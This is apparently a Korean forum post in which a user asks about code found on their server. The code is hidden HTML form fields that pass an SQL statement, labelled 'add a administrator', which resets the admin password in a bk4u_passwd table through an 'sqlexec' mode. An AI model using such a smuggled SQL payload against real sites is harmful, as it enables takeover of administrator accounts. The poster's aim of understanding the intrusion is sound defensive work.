간단 html 소스

macros의 이미지

서버에 이런코드가 떨어져 있는데요

[input type='hidden' name='sqlcmd' value="# add a administrator %NL%UPDATE bk4u_passwd SET passwd=PASSWORD('xxxx') WHERE user='admin';"]

[input type='hidden' name='mode' value='sqlexec']

제가 보기엔 sql 인젝션 코드 같은데 어떤 내용인가요?